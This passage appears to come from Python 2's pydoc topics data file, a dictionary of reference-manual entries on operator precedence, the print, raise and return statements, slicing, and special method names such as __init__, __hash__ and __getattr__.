most objects as soon as they become\nunreachable, but is not guaranteed to collect garbage containing\ncircular references. See the documentation of the "gc" module for\ninformation on controlling the collection of cyclic garbage. Other\nimplementations act differently and CPython may change. Do not depend\non immediate finalization of objects when they become unreachable (ex:\nalways close files).\n\nNote that the use of the implementation\'s tracing or debugging\nfacilities may keep objects alive that would normally be collectable.\nAlso note that catching an exception with a \'"try"..."except"\'\nstatement may keep objects alive.\n\nSome objects contain references to "external" resources such as open\nfiles or windows. It is understood that these resources are freed\nwhen the object is garbage-collected, but since garbage collection is\nnot guaranteed to happen, such objects also provide an explicit way to\nrelease the external resource, usually a "close()" method. Programs\nare strongly recommended to explicitly close such objects. The\n\'"try"..."finally"\' statement provides a convenient way to do this.\n\nSome objects contain references to other objects; these are called\n*containers*. Examples of containers are tuples, lists and\ndictionaries. The references are part of a container\'s value. In\nmost cases, when we talk about the value of a container, we imply the\nvalues, not the identities of the contained objects; however, when we\ntalk about the mutability of a container, only the identities of the\nimmediately contained objects are implied. So, if an immutable\ncontainer (like a tuple) contains a reference to a mutable object, its\nvalue changes if that mutable object is changed.\n\nTypes affect almost all aspects of object behavior. Even the\nimportance of object identity is affected in some sense: for immutable\ntypes, operations that compute new values may actually return a\nreference to any existing object with the same type and value, while\nfor mutable objects this is not allowed. E.g., after "a = 1; b = 1",\n"a" and "b" may or may not refer to the same object with the value\none, depending on the implementation, but after "c = []; d = []", "c"\nand "d" are guaranteed to refer to two different, unique, newly\ncreated empty lists. (Note that "c = d = []" assigns the same object\nto both "c" and "d".)\n', 'operator-summary': u'\nOperator precedence\n*******************\n\nThe following table summarizes the operator precedences in Python,\nfrom lowest precedence (least binding) to highest precedence (most\nbinding). Operators in the same box have the same precedence. Unless\nthe syntax is explicitly given, operators are binary. Operators in\nthe same box group left to right (except for comparisons, including\ntests, which all have the same precedence and chain from left to right\n--- see section Comparisons --- and exponentiation, which groups from\nright to left).\n\n+-------------------------------------------------+---------------------------------------+\n| Operator | Description |\n+=================================================+=======================================+\n| "lambda" | Lambda expression |\n+-------------------------------------------------+---------------------------------------+\n| "if" -- "else" | Conditional expression |\n+-------------------------------------------------+---------------------------------------+\n| "or" | Boolean OR |\n+-------------------------------------------------+---------------------------------------+\n| "and" | Boolean AND |\n+-------------------------------------------------+---------------------------------------+\n| "not" "x" | Boolean NOT |\n+-------------------------------------------------+---------------------------------------+\n| "in", "not in", "is", "is not", "<", "<=", ">", | Comparisons, including membership |\n| ">=", "<>", "!=", "==" | tests and identity tests |\n+-------------------------------------------------+---------------------------------------+\n| "|" | Bitwise OR |\n+-------------------------------------------------+---------------------------------------+\n| "^" | Bitwise XOR |\n+-------------------------------------------------+---------------------------------------+\n| "&" | Bitwise AND |\n+-------------------------------------------------+---------------------------------------+\n| "<<", ">>" | Shifts |\n+-------------------------------------------------+---------------------------------------+\n| "+", "-" | Addition and subtraction |\n+-------------------------------------------------+---------------------------------------+\n| "*", "/", "//", "%" | Multiplication, division, remainder |\n| | [8] |\n+-------------------------------------------------+---------------------------------------+\n| "+x", "-x", "~x" | Positive, negative, bitwise NOT |\n+-------------------------------------------------+---------------------------------------+\n| "**" | Exponentiation [9] |\n+-------------------------------------------------+---------------------------------------+\n| "x[index]", "x[index:index]", | Subscription, slicing, call, |\n| "x(arguments...)", "x.attribute" | attribute reference |\n+-------------------------------------------------+---------------------------------------+\n| "(expressions...)", "[expressions...]", "{key: | Binding or tuple display, list |\n| value...}", "`expressions...`" | display, dictionary display, string |\n| | conversion |\n+-------------------------------------------------+---------------------------------------+\n\n-[ Footnotes ]-\n\n[1] In Python 2.3 and later releases, a list comprehension "leaks"\n the control variables of each "for" it contains into the\n containing scope. However, this behavior is deprecated, and\n relying on it will not work in Python 3.\n\n[2] While "abs(x%y) < abs(y)" is true mathematically, for floats\n it may not be true numerically due to roundoff. For example, and\n assuming a platform on which a Python float is an IEEE 754 double-\n precision number, in order that "-1e-100 % 1e100" have the same\n sign as "1e100", the computed result is "-1e-100 + 1e100", which\n is numerically exactly equal to "1e100". The function\n "math.fmod()" returns a result whose sign matches the sign of the\n first argument instead, and so returns "-1e-100" in this case.\n Which approach is more appropriate depends on the application.\n\n[3] If x is very close to an exact integer multiple of y, it\'s\n possible for "floor(x/y)" to be one larger than "(x-x%y)/y" due to\n rounding. In such cases, Python returns the latter result, in\n order to preserve that "divmod(x,y)[0] * y + x % y" be very close\n to "x".\n\n[4] While comparisons between unicode strings make sense at the\n byte level, they may be counter-intuitive to users. For example,\n the strings "u"\\u00C7"" and "u"\\u0043\\u0327"" compare differently,\n even though they both represent the same unicode character (LATIN\n CAPITAL LETTER C WITH CEDILLA). To compare strings in a human\n recognizable way, compare using "unicodedata.normalize()".\n\n[5] The implementation computes this efficiently, without\n constructing lists or sorting.\n\n[6] Earlier versions of Python used lexicographic comparison of\n the sorted (key, value) lists, but this was very expensive for the\n common case of comparing for equality. An even earlier version of\n Python compared dictionaries by identity only, but this caused\n surprises because people expected to be able to test a dictionary\n for emptiness by comparing it to "{}".\n\n[7] Due to automatic garbage-collection, free lists, and the\n dynamic nature of descriptors, you may notice seemingly unusual\n behaviour in certain uses of the "is" operator, like those\n involving comparisons between instance methods, or constants.\n Check their documentation for more info.\n\n[8] The "%" operator is also used for string formatting; the same\n precedence applies.\n\n[9] The power operator "**" binds less tightly than an arithmetic\n or bitwise unary operator on its right, that is, "2**-1" is "0.5".\n', 'pass': u'\nThe "pass" statement\n********************\n\n pass_stmt ::= "pass"\n\n"pass" is a null operation --- when it is executed, nothing happens.\nIt is useful as a placeholder when a statement is required\nsyntactically, but no code needs to be executed, for example:\n\n def f(arg): pass # a function that does nothing (yet)\n\n class C: pass # a class with no methods (yet)\n', 'power': u'\nThe power operator\n******************\n\nThe power operator binds more tightly than unary operators on its\nleft; it binds less tightly than unary operators on its right. The\nsyntax is:\n\n power ::= primary ["**" u_expr]\n\nThus, in an unparenthesized sequence of power and unary operators, the\noperators are evaluated from right to left (this does not constrain\nthe evaluation order for the operands): "-1**2" results in "-1".\n\nThe power operator has the same semantics as the built-in "pow()"\nfunction, when called with two arguments: it yields its left argument\nraised to the power of its right argument. The numeric arguments are\nfirst converted to a common type. The result type is that of the\narguments after coercion.\n\nWith mixed operand types, the coercion rules for binary arithmetic\noperators apply. For int and long int operands, the result has the\nsame type as the operands (after coercion) unless the second argument\nis negative; in that case, all arguments are converted to float and a\nfloat result is delivered. For example, "10**2" returns "100", but\n"10**-2" returns "0.01". (This last feature was added in Python 2.2.\nIn Python 2.1 and before, if both arguments were of integer types and\nthe second argument was negative, an exception was raised).\n\nRaising "0.0" to a negative power results in a "ZeroDivisionError".\nRaising a negative number to a fractional power results in a\n"ValueError".\n', 'print': u'\nThe "print" statement\n*********************\n\n print_stmt ::= "print" ([expression ("," expression)* [","]]\n | ">>" expression [("," expression)+ [","]])\n\n"print" evaluates each expression in turn and writes the resulting\nobject to standard output (see below). If an object is not a string,\nit is first converted to a string using the rules for string\nconversions. The (resulting or original) string is then written. A\nspace is written before each object is (converted and) written, unless\nthe output system believes it is positioned at the beginning of a\nline. This is the case (1) when no characters have yet been written\nto standard output, (2) when the last character written to standard\noutput is a whitespace character except "\' \'", or (3) when the last\nwrite operation on standard output was not a "print" statement. (In\nsome cases it may be functional to write an empty string to standard\noutput for this reason.)\n\nNote: Objects which act like file objects but which are not the\n built-in file objects often do not properly emulate this aspect of\n the file object\'s behavior, so it is best not to rely on this.\n\nA "\'\\n\'" character is written at the end, unless the "print" statement\nends with a comma. This is the only action if the statement contains\njust the keyword "print".\n\nStandard output is defined as the file object named "stdout" in the\nbuilt-in module "sys". If no such object exists, or if it does not\nhave a "write()" method, a "RuntimeError" exception is raised.\n\n"print" also has an extended form, defined by the second portion of\nthe syntax described above. This form is sometimes referred to as\n""print" chevron." In this form, the first expression after the ">>"\nmust evaluate to a "file-like" object, specifically an object that has\na "write()" method as described above. With this extended form, the\nsubsequent expressions are printed to this file object. If the first\nexpression evaluates to "None", then "sys.stdout" is used as the file\nfor output.\n', 'raise': u'\nThe "raise" statement\n*********************\n\n raise_stmt ::= "raise" [expression ["," expression ["," expression]]]\n\nIf no expressions are present, "raise" re-raises the last exception\nthat was active in the current scope. If no exception is active in\nthe current scope, a "TypeError" exception is raised indicating that\nthis is an error (if running under IDLE, a "Queue.Empty" exception is\nraised instead).\n\nOtherwise, "raise" evaluates the expressions to get three objects,\nusing "None" as the value of omitted expressions. The first two\nobjects are used to determine the *type* and *value* of the exception.\n\nIf the first object is an instance, the type of the exception is the\nclass of the instance, the instance itself is the value, and the\nsecond object must be "None".\n\nIf the first object is a class, it becomes the type of the exception.\nThe second object is used to determine the exception value: If it is\nan instance of the class, the instance becomes the exception value. If\nthe second object is a tuple, it is used as the argument list for the\nclass constructor; if it is "None", an empty argument list is used,\nand any other object is treated as a single argument to the\nconstructor. The instance so created by calling the constructor is\nused as the exception value.\n\nIf a third object is present and not "None", it must be a traceback\nobject (see section The standard type hierarchy), and it is\nsubstituted instead of the current location as the place where the\nexception occurred. If the third object is present and not a\ntraceback object or "None", a "TypeError" exception is raised. The\nthree-expression form of "raise" is useful to re-raise an exception\ntransparently in an except clause, but "raise" with no expressions\nshould be preferred if the exception to be re-raised was the most\nrecently active exception in the current scope.\n\nAdditional information on exceptions can be found in section\nExceptions, and information about handling exceptions is in section\nThe try statement.\n', 'return': u'\nThe "return" statement\n**********************\n\n return_stmt ::= "return" [expression_list]\n\n"return" may only occur syntactically nested in a function definition,\nnot within a nested class definition.\n\nIf an expression list is present, it is evaluated, else "None" is\nsubstituted.\n\n"return" leaves the current function call with the expression list (or\n"None") as return value.\n\nWhen "return" passes control out of a "try" statement with a "finally"\nclause, that "finally" clause is executed before really leaving the\nfunction.\n\nIn a generator function, the "return" statement is not allowed to\ninclude an "expression_list". In that context, a bare "return"\nindicates that the generator is done and will cause "StopIteration" to\nbe raised.\n', 'sequence-types': u'\nEmulating container types\n*************************\n\nThe following methods can be defined to implement container objects.\nContainers usually are sequences (such as lists or tuples) or mappings\n(like dictionaries), but can represent other containers as well. The\nfirst set of methods is used either to emulate a sequence or to\nemulate a mapping; the difference is that for a sequence, the\nallowable keys should be the integers *k* for which "0 <= k < N" where\n*N* is the length of the sequence, or slice objects, which define a\nrange of items. (For backwards compatibility, the method\n"__getslice__()" (see below) can also be defined to handle simple, but\nnot extended slices.) It is also recommended that mappings provide the\nmethods "keys()", "values()", "items()", "has_key()", "get()",\n"clear()", "setdefault()", "iterkeys()", "itervalues()",\n"iteritems()", "pop()", "popitem()", "copy()", and "update()" behaving\nsimilar to those for Python\'s standard dictionary objects. The\n"UserDict" module provides a "DictMixin" class to help create those\nmethods from a base set of "__getitem__()", "__setitem__()",\n"__delitem__()", and "keys()". Mutable sequences should provide\nmethods "append()", "count()", "index()", "extend()", "insert()",\n"pop()", "remove()", "reverse()" and "sort()", like Python standard\nlist objects. Finally, sequence types should implement addition\n(meaning concatenation) and multiplication (meaning repetition) by\ndefining the methods "__add__()", "__radd__()", "__iadd__()",\n"__mul__()", "__rmul__()" and "__imul__()" described below; they\nshould not define "__coerce__()" or other numerical operators. It is\nrecommended that both mappings and sequences implement the\n"__contains__()" method to allow efficient use of the "in" operator;\nfor mappings, "in" should be equivalent of "has_key()"; for sequences,\nit should search through the values. It is further recommended that\nboth mappings and sequences implement the "__iter__()" method to allow\nefficient iteration through the container; for mappings, "__iter__()"\nshould be the same as "iterkeys()"; for sequences, it should iterate\nthrough the values.\n\nobject.__len__(self)\n\n Called to implement the built-in function "len()". Should return\n the length of the object, an integer ">=" 0. Also, an object that\n doesn\'t define a "__nonzero__()" method and whose "__len__()"\n method returns zero is considered to be false in a Boolean context.\n\nobject.__getitem__(self, key)\n\n Called to implement evaluation of "self[key]". For sequence types,\n the accepted keys should be integers and slice objects. Note that\n the special interpretation of negative indexes (if the class wishes\n to emulate a sequence type) is up to the "__getitem__()" method. If\n *key* is of an inappropriate type, "TypeError" may be raised; if of\n a value outside the set of indexes for the sequence (after any\n special interpretation of negative values), "IndexError" should be\n raised. For mapping types, if *key* is missing (not in the\n container), "KeyError" should be raised.\n\n Note: "for" loops expect that an "IndexError" will be raised for\n illegal indexes to allow proper detection of the end of the\n sequence.\n\nobject.__missing__(self, key)\n\n Called by "dict"."__getitem__()" to implement "self[key]" for dict\n subclasses when key is not in the dictionary.\n\nobject.__setitem__(self, key, value)\n\n Called to implement assignment to "self[key]". Same note as for\n "__getitem__()". This should only be implemented for mappings if\n the objects support changes to the values for keys, or if new keys\n can be added, or for sequences if elements can be replaced. The\n same exceptions should be raised for improper *key* values as for\n the "__getitem__()" method.\n\nobject.__delitem__(self, key)\n\n Called to implement deletion of "self[key]". Same note as for\n "__getitem__()". This should only be implemented for mappings if\n the objects support removal of keys, or for sequences if elements\n can be removed from the sequence. The same exceptions should be\n raised for improper *key* values as for the "__getitem__()" method.\n\nobject.__iter__(self)\n\n This method is called when an iterator is required for a container.\n This method should return a new iterator object that can iterate\n over all the objects in the container. For mappings, it should\n iterate over the keys of the container, and should also be made\n available as the method "iterkeys()".\n\n Iterator objects also need to implement this method; they are\n required to return themselves. For more information on iterator\n objects, see Iterator Types.\n\nobject.__reversed__(self)\n\n Called (if present) by the "reversed()" built-in to implement\n reverse iteration. It should return a new iterator object that\n iterates over all the objects in the container in reverse order.\n\n If the "__reversed__()" method is not provided, the "reversed()"\n built-in will fall back to using the sequence protocol ("__len__()"\n and "__getitem__()"). Objects that support the sequence protocol\n should only provide "__reversed__()" if they can provide an\n implementation that is more efficient than the one provided by\n "reversed()".\n\n New in version 2.6.\n\nThe membership test operators ("in" and "not in") are normally\nimplemented as an iteration through a sequence. However, container\nobjects can supply the following special method with a more efficient\nimplementation, which also does not require the object be a sequence.\n\nobject.__contains__(self, item)\n\n Called to implement membership test operators. Should return true\n if *item* is in *self*, false otherwise. For mapping objects, this\n should consider the keys of the mapping rather than the values or\n the key-item pairs.\n\n For objects that don\'t define "__contains__()", the membership test\n first tries iteration via "__iter__()", then the old sequence\n iteration protocol via "__getitem__()", see this section in the\n language reference.\n', 'shifting': u'\nShifting operations\n*******************\n\nThe shifting operations have lower priority than the arithmetic\noperations:\n\n shift_expr ::= a_expr | shift_expr ( "<<" | ">>" ) a_expr\n\nThese operators accept plain or long integers as arguments. The\narguments are converted to a common type. They shift the first\nargument to the left or right by the number of bits given by the\nsecond argument.\n\nA right shift by *n* bits is defined as division by "pow(2, n)". A\nleft shift by *n* bits is defined as multiplication with "pow(2, n)".\nNegative shift counts raise a "ValueError" exception.\n\nNote: In the current implementation, the right-hand operand is\n required to be at most "sys.maxsize". If the right-hand operand is\n larger than "sys.maxsize" an "OverflowError" exception is raised.\n', 'slicings': u'\nSlicings\n********\n\nA slicing selects a range of items in a sequence object (e.g., a\nstring, tuple or list). Slicings may be used as expressions or as\ntargets in assignment or "del" statements. The syntax for a slicing:\n\n slicing ::= simple_slicing | extended_slicing\n simple_slicing ::= primary "[" short_slice "]"\n extended_slicing ::= primary "[" slice_list "]"\n slice_list ::= slice_item ("," slice_item)* [","]\n slice_item ::= expression | proper_slice | ellipsis\n proper_slice ::= short_slice | long_slice\n short_slice ::= [lower_bound] ":" [upper_bound]\n long_slice ::= short_slice ":" [stride]\n lower_bound ::= expression\n upper_bound ::= expression\n stride ::= expression\n ellipsis ::= "..."\n\nThere is ambiguity in the formal syntax here: anything that looks like\nan expression list also looks like a slice list, so any subscription\ncan be interpreted as a slicing. Rather than further complicating the\nsyntax, this is disambiguated by defining that in this case the\ninterpretation as a subscription takes priority over the\ninterpretation as a slicing (this is the case if the slice list\ncontains no proper slice nor ellipses). Similarly, when the slice\nlist has exactly one short slice and no trailing comma, the\ninterpretation as a simple slicing takes priority over that as an\nextended slicing.\n\nThe semantics for a simple slicing are as follows. The primary must\nevaluate to a sequence object. The lower and upper bound expressions,\nif present, must evaluate to plain integers; defaults are zero and the\n"sys.maxint", respectively. If either bound is negative, the\nsequence\'s length is added to it. The slicing now selects all items\nwith index *k* such that "i <= k < j" where *i* and *j* are the\nspecified lower and upper bounds. This may be an empty sequence. It\nis not an error if *i* or *j* lie outside the range of valid indexes\n(such items don\'t exist so they aren\'t selected).\n\nThe semantics for an extended slicing are as follows. The primary\nmust evaluate to a mapping object, and it is indexed with a key that\nis constructed from the slice list, as follows. If the slice list\ncontains at least one comma, the key is a tuple containing the\nconversion of the slice items; otherwise, the conversion of the lone\nslice item is the key. The conversion of a slice item that is an\nexpression is that expression. The conversion of an ellipsis slice\nitem is the built-in "Ellipsis" object. The conversion of a proper\nslice is a slice object (see section The standard type hierarchy)\nwhose "start", "stop" and "step" attributes are the values of the\nexpressions given as lower bound, upper bound and stride,\nrespectively, substituting "None" for missing expressions.\n', 'specialattrs': u'\nSpecial Attributes\n******************\n\nThe implementation adds a few special read-only attributes to several\nobject types, where they are relevant. Some of these are not reported\nby the "dir()" built-in function.\n\nobject.__dict__\n\n A dictionary or other mapping object used to store an object\'s\n (writable) attributes.\n\nobject.__methods__\n\n Deprecated since version 2.2: Use the built-in function "dir()" to\n get a list of an object\'s attributes. This attribute is no longer\n available.\n\nobject.__members__\n\n Deprecated since version 2.2: Use the built-in function "dir()" to\n get a list of an object\'s attributes. This attribute is no longer\n available.\n\ninstance.__class__\n\n The class to which a class instance belongs.\n\nclass.__bases__\n\n The tuple of base classes of a class object.\n\nclass.__name__\n\n The name of the class or type.\n\nThe following attributes are only supported by *new-style class*es.\n\nclass.__mro__\n\n This attribute is a tuple of classes that are considered when\n looking for base classes during method resolution.\n\nclass.mro()\n\n This method can be overridden by a metaclass to customize the\n method resolution order for its instances. It is called at class\n instantiation, and its result is stored in "__mro__".\n\nclass.__subclasses__()\n\n Each new-style class keeps a list of weak references to its\n immediate subclasses. This method returns a list of all those\n references still alive. Example:\n\n >>> int.__subclasses__()\n [<type \'bool\'>]\n\n-[ Footnotes ]-\n\n[1] Additional information on these special methods may be found\n in the Python Reference Manual (Basic customization).\n\n[2] As a consequence, the list "[1, 2]" is considered equal to\n "[1.0, 2.0]", and similarly for tuples.\n\n[3] They must have since the parser can\'t tell the type of the\n operands.\n\n[4] Cased characters are those with general category property\n being one of "Lu" (Letter, uppercase), "Ll" (Letter, lowercase),\n or "Lt" (Letter, titlecase).\n\n[5] To format only a tuple you should therefore provide a\n singleton tuple whose only element is the tuple to be formatted.\n\n[6] The advantage of leaving the newline on is that returning an\n empty string is then an unambiguous EOF indication. It is also\n possible (in cases where it might matter, for example, if you want\n to make an exact copy of a file while scanning its lines) to tell\n whether the last line of a file ended in a newline or not (yes\n this happens!).\n', 'specialnames': u'\nSpecial method names\n********************\n\nA class can implement certain operations that are invoked by special\nsyntax (such as arithmetic operations or subscripting and slicing) by\ndefining methods with special names. This is Python\'s approach to\n*operator overloading*, allowing classes to define their own behavior\nwith respect to language operators. For instance, if a class defines\na method named "__getitem__()", and "x" is an instance of this class,\nthen "x[i]" is roughly equivalent to "x.__getitem__(i)" for old-style\nclasses and "type(x).__getitem__(x, i)" for new-style classes. Except\nwhere mentioned, attempts to execute an operation raise an exception\nwhen no appropriate method is defined (typically "AttributeError" or\n"TypeError").\n\nWhen implementing a class that emulates any built-in type, it is\nimportant that the emulation only be implemented to the degree that it\nmakes sense for the object being modelled. For example, some\nsequences may work well with retrieval of individual elements, but\nextracting a slice may not make sense. (One example of this is the\n"NodeList" interface in the W3C\'s Document Object Model.)\n\n\nBasic customization\n===================\n\nobject.__new__(cls[, ...])\n\n Called to create a new instance of class *cls*. "__new__()" is a\n static method (special-cased so you need not declare it as such)\n that takes the class of which an instance was requested as its\n first argument. The remaining arguments are those passed to the\n object constructor expression (the call to the class). The return\n value of "__new__()" should be the new object instance (usually an\n instance of *cls*).\n\n Typical implementations create a new instance of the class by\n invoking the superclass\'s "__new__()" method using\n "super(currentclass, cls).__new__(cls[, ...])" with appropriate\n arguments and then modifying the newly-created instance as\n necessary before returning it.\n\n If "__new__()" returns an instance of *cls*, then the new\n instance\'s "__init__()" method will be invoked like\n "__init__(self[, ...])", where *self* is the new instance and the\n remaining arguments are the same as were passed to "__new__()".\n\n If "__new__()" does not return an instance of *cls*, then the new\n instance\'s "__init__()" method will not be invoked.\n\n "__new__()" is intended mainly to allow subclasses of immutable\n types (like int, str, or tuple) to customize instance creation. It\n is also commonly overridden in custom metaclasses in order to\n customize class creation.\n\nobject.__init__(self[, ...])\n\n Called after the instance has been created (by "__new__()"), but\n before it is returned to the caller. The arguments are those\n passed to the class constructor expression. If a base class has an\n "__init__()" method, the derived class\'s "__init__()" method, if\n any, must explicitly call it to ensure proper initialization of the\n base class part of the instance; for example:\n "BaseClass.__init__(self, [args...])".\n\n Because "__new__()" and "__init__()" work together in constructing\n objects ("__new__()" to create it, and "__init__()" to customise\n it), no non-"None" value may be returned by "__init__()"; doing so\n will cause a "TypeError" to be raised at runtime.\n\nobject.__del__(self)\n\n Called when the instance is about to be destroyed. This is also\n called a destructor. If a base class has a "__del__()" method, the\n derived class\'s "__del__()" method, if any, must explicitly call it\n to ensure proper deletion of the base class part of the instance.\n Note that it is possible (though not recommended!) for the\n "__del__()" method to postpone destruction of the instance by\n creating a new reference to it. It may then be called at a later\n time when this new reference is deleted. It is not guaranteed that\n "__del__()" methods are called for objects that still exist when\n the interpreter exits.\n\n Note: "del x" doesn\'t directly call "x.__del__()" --- the former\n decrements the reference count for "x" by one, and the latter is\n only called when "x"\'s reference count reaches zero. Some common\n situations that may prevent the reference count of an object from\n going to zero include: circular references between objects (e.g.,\n a doubly-linked list or a tree data structure with parent and\n child pointers); a reference to the object on the stack frame of\n a function that caught an exception (the traceback stored in\n "sys.exc_traceback" keeps the stack frame alive); or a reference\n to the object on the stack frame that raised an unhandled\n exception in interactive mode (the traceback stored in\n "sys.last_traceback" keeps the stack frame alive). The first\n situation can only be remedied by explicitly breaking the cycles;\n the latter two situations can be resolved by storing "None" in\n "sys.exc_traceback" or "sys.last_traceback". Circular references\n which are garbage are detected when the option cycle detector is\n enabled (it\'s on by default), but can only be cleaned up if there\n are no Python-level "__del__()" methods involved. Refer to the\n documentation for the "gc" module for more information about how\n "__del__()" methods are handled by the cycle detector,\n particularly the description of the "garbage" value.\n\n Warning: Due to the precarious circumstances under which\n "__del__()" methods are invoked, exceptions that occur during\n their execution are ignored, and a warning is printed to\n "sys.stderr" instead. Also, when "__del__()" is invoked in\n response to a module being deleted (e.g., when execution of the\n program is done), other globals referenced by the "__del__()"\n method may already have been deleted or in the process of being\n torn down (e.g. the import machinery shutting down). For this\n reason, "__del__()" methods should do the absolute minimum needed\n to maintain external invariants. Starting with version 1.5,\n Python guarantees that globals whose name begins with a single\n underscore are deleted from their module before other globals are\n deleted; if no other references to such globals exist, this may\n help in assuring that imported modules are still available at the\n time when the "__del__()" method is called.\n\n See also the "-R" command-line option.\n\nobject.__repr__(self)\n\n Called by the "repr()" built-in function and by string conversions\n (reverse quotes) to compute the "official" string representation of\n an object. If at all possible, this should look like a valid\n Python expression that could be used to recreate an object with the\n same value (given an appropriate environment). If this is not\n possible, a string of the form "<...some useful description...>"\n should be returned. The return value must be a string object. If a\n class defines "__repr__()" but not "__str__()", then "__repr__()"\n is also used when an "informal" string representation of instances\n of that class is required.\n\n This is typically used for debugging, so it is important that the\n representation is information-rich and unambiguous.\n\nobject.__str__(self)\n\n Called by the "str()" built-in function and by the "print"\n statement to compute the "informal" string representation of an\n object. This differs from "__repr__()" in that it does not have to\n be a valid Python expression: a more convenient or concise\n representation may be used instead. The return value must be a\n string object.\n\nobject.__lt__(self, other)\nobject.__le__(self, other)\nobject.__eq__(self, other)\nobject.__ne__(self, other)\nobject.__gt__(self, other)\nobject.__ge__(self, other)\n\n New in version 2.1.\n\n These are the so-called "rich comparison" methods, and are called\n for comparison operators in preference to "__cmp__()" below. The\n correspondence between operator symbols and method names is as\n follows: "x<y" calls "x.__lt__(y)", "x<=y" calls "x.__le__(y)",\n "x==y" calls "x.__eq__(y)", "x!=y" and "x<>y" call "x.__ne__(y)",\n "x>y" calls "x.__gt__(y)", and "x>=y" calls "x.__ge__(y)".\n\n A rich comparison method may return the singleton "NotImplemented"\n if it does not implement the operation for a given pair of\n arguments. By convention, "False" and "True" are returned for a\n successful comparison. However, these methods can return any value,\n so if the comparison operator is used in a Boolean context (e.g.,\n in the condition of an "if" statement), Python will call "bool()"\n on the value to determine if the result is true or false.\n\n There are no implied relationships among the comparison operators.\n The truth of "x==y" does not imply that "x!=y" is false.\n Accordingly, when defining "__eq__()", one should also define\n "__ne__()" so that the operators will behave as expected. See the\n paragraph on "__hash__()" for some important notes on creating\n *hashable* objects which support custom comparison operations and\n are usable as dictionary keys.\n\n There are no swapped-argument versions of these methods (to be used\n when the left argument does not support the operation but the right\n argument does); rather, "__lt__()" and "__gt__()" are each other\'s\n reflection, "__le__()" and "__ge__()" are each other\'s reflection,\n and "__eq__()" and "__ne__()" are their own reflection.\n\n Arguments to rich comparison methods are never coerced.\n\n To automatically generate ordering operations from a single root\n operation, see "functools.total_ordering()".\n\nobject.__cmp__(self, other)\n\n Called by comparison operations if rich comparison (see above) is\n not defined. Should return a negative integer if "self < other",\n zero if "self == other", a positive integer if "self > other". If\n no "__cmp__()", "__eq__()" or "__ne__()" operation is defined,\n class instances are compared by object identity ("address"). See\n also the description of "__hash__()" for some important notes on\n creating *hashable* objects which support custom comparison\n operations and are usable as dictionary keys. (Note: the\n restriction that exceptions are not propagated by "__cmp__()" has\n been removed since Python 1.5.)\n\nobject.__rcmp__(self, other)\n\n Changed in version 2.1: No longer supported.\n\nobject.__hash__(self)\n\n Called by built-in function "hash()" and for operations on members\n of hashed collections including "set", "frozenset", and "dict".\n "__hash__()" should return an integer. The only required property\n is that objects which compare equal have the same hash value; it is\n advised to somehow mix together (e.g. using exclusive or) the hash\n values for the components of the object that also play a part in\n comparison of objects.\n\n If a class does not define a "__cmp__()" or "__eq__()" method it\n should not define a "__hash__()" operation either; if it defines\n "__cmp__()" or "__eq__()" but not "__hash__()", its instances will\n not be usable in hashed collections. If a class defines mutable\n objects and implements a "__cmp__()" or "__eq__()" method, it\n should not implement "__hash__()", since hashable collection\n implementations require that a object\'s hash value is immutable (if\n the object\'s hash value changes, it will be in the wrong hash\n bucket).\n\n User-defined classes have "__cmp__()" and "__hash__()" methods by\n default; with them, all objects compare unequal (except with\n themselves) and "x.__hash__()" returns a result derived from\n "id(x)".\n\n Classes which inherit a "__hash__()" method from a parent class but\n change the meaning of "__cmp__()" or "__eq__()" such that the hash\n value returned is no longer appropriate (e.g. by switching to a\n value-based concept of equality instead of the default identity\n based equality) can explicitly flag themselves as being unhashable\n by setting "__hash__ = None" in the class definition. Doing so\n means that not only will instances of the class raise an\n appropriate "TypeError" when a program attempts to retrieve their\n hash value, but they will also be correctly identified as\n unhashable when checking "isinstance(obj, collections.Hashable)"\n (unlike classes which define their own "__hash__()" to explicitly\n raise "TypeError").\n\n Changed in version 2.5: "__hash__()" may now also return a long\n integer object; the 32-bit integer is then derived from the hash of\n that object.\n\n Changed in version 2.6: "__hash__" may now be set to "None" to\n explicitly flag instances of a class as unhashable.\n\nobject.__nonzero__(self)\n\n Called to implement truth value testing and the built-in operation\n "bool()"; should return "False" or "True", or their integer\n equivalents "0" or "1". When this method is not defined,\n "__len__()" is called, if it is defined, and the object is\n considered true if its result is nonzero. If a class defines\n neither "__len__()" nor "__nonzero__()", all its instances are\n considered true.\n\nobject.__unicode__(self)\n\n Called to implement "unicode()" built-in; should return a Unicode\n object. When this method is not defined, string conversion is\n attempted, and the result of string conversion is converted to\n Unicode using the system default encoding.\n\n\nCustomizing attribute access\n============================\n\nThe following methods can be defined to customize the meaning of\nattribute access (use of, assignment to, or deletion of "x.name") for\nclass instances.\n\nobject.__getattr__(self, name)\n\n Called when an attribute lookup has not found the attribute in the\n usual places (i.e. it is not an instance attribute nor is it found\n in the class tree for "self"). "name" is the attribute name. This\n method should return the (computed) attribute value or raise an\n "AttributeError" exception.\n\n Note that if the attribute is found through the normal mechanism,\n "__getattr__()" is not called. (This is an intentional asymmetry\n between "__getattr__()" and "__setattr__()".) This is done both for\n efficiency reasons and because otherwise "__getattr__()" would have\n no way to access other attributes of the instance. Note that at\n least for instance variables, you can fake total control by not\n inserting any values in the instance attribute dictionary (but\n instead inserting them in another object). See the\n "__getattribute__()" method below for a way to actually get total\n control in new-style classes.\n\nobject.__setattr__(self, name, value)\n\n Called when an attribute assignment is attempted. This is called\n instead of the normal mechanism (i.e. store the value in the\n instance dictionary). *name* is the attribute name, *value* is the\n value to be assigned to it.\n\n If "__setattr__()" wants to assign to an instance attribute, it\n should not simply execute "self.name = value" --- this would cause\n a recursive call to itself. Instead, it should insert the value in\n the dictionary of instance attributes, e.g., "self.__dict__[name] =\n value". For new-style classes, rather than accessing the instance\n dictionary, it should call the base class method with the same\n name, for example, "object.__setattr__(self, name, value)".\n\nobject.__delattr__(self, name)\n\n Like "__setattr__()" but for attribute deletion instead of\n assignment. This should only be implemented if "del obj.name" is\n meaningful for the object.\n\n\nMore attribute access for new-style classes\n-------------------------------------------\n\nThe following methods only apply to new-style classes.\n\nobject.__getattribute__(self, name)\n\n Called unconditionally to implement attribute accesses for\n instances of the class. If the class also defines "__getattr__()",\n the latter will not be called unless "__getattribute__()" either\n calls it explicitly or raises an "AttributeError". This method\n should return the (computed) attribute value or raise an\n "AttributeError" exception. In order to avoid infinite recursion in\n this method, its implementation should always call the base class\n method with the same name to access any attributes it needs, for\n example, "object.__getattribute__(self, name)".\n\n Note: This method may still be bypassed when looking up special\n methods as the result of implicit invocation via language syntax\n or built-in functions. See Special method lookup for new-style\n classes.\n\n\nImplementing Descriptors\n------------------------\n\nThe following methods only apply when an instance of the class\ncontaining the method (a so-called *descriptor* class) appears in 